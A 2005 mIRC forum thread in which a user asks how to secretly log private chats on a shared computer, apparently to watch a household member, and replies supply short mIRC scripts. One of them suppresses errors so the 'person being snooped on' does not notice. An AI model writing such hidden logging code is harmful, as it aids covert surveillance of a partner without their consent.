mIRC Homepage
Posted By: pUff mIRC log - 28/04/05 10:13 PM
I would like to log mIRC private chats without the log options on within the mIRC options so that no one can turn the log off or even see that there is any log on and can not be turn off by anyone.
Posted By: SladeKraven Re: mIRC log - 28/04/05 10:23 PM
Code:
On *:Text:*:?: {
  write $+(logs\,$nick,.log) $date @ $time $+(<,$nick,>) $1-
}


If you are planning on releasing your script, wouldn't the audience want the choice to enable log and disable log?
Posted By: pUff Re: mIRC log - 28/04/05 10:50 PM
I'm wanting to see what people are doing on my personal computer when i'm not around.
Posted By: DaveC Re: mIRC log - 28/04/05 11:32 PM
on *:TEXT:*:?: { write $+("c:\,$mklogfn($nick),.txt") $date @ $time $+(<,$nick,>) $1- | :error | reseterror }
on *:INPUT:?:{ write $+("c:\,$mklogfn($target),.txt") $date @ $time $+(<,$me,>) $1- | :error | reseterror }

[edit]
just added "| :error | reseterror" so if something does go wrong the person being snooped on dont see it <evil grin>
Posted By: alhammer Re: mIRC log - 29/04/05 01:46 AM
Hey. You can lock mIRC. ALT + O. Other...Lock. This will keep people from messing with it when your away. smile
Posted By: SladeKraven Re: mIRC log - 29/04/05 01:50 AM
He wants to monitor incoming/outgoing messages. Not disable it completely..
Posted By: alhammer Re: mIRC log - 29/04/05 02:00 AM
It's just an option.
Posted By: SladeKraven Re: mIRC log - 29/04/05 02:01 AM
Nah, its out the equation. :tongue:
Posted By: DaveC Re: mIRC log - 29/04/05 05:45 AM
What ya reckon? his wifey talking to guys online?

/me rings springer for a mirc special
Posted By: SladeKraven Re: mIRC log - 29/04/05 07:25 AM
* Andy goes with the flow and chants Jerry, Jerry, Jerry!

:grin
Posted By: pUff Re: mIRC log - 29/04/05 05:19 PM
Um... something like that... I been having trubles at home and i need to keep an eye on someone so my personal info dont get out
Posted By: DaveC Re: mIRC log - 29/04/05 11:14 PM
/me chants pUffy pUffy pUffy pUffy pUffy

And rings Judge Judy as well.
Posted By: pUff Re: mIRC log - 30/04/05 09:20 PM
ha ha ha :P
© mIRC Discussion Forums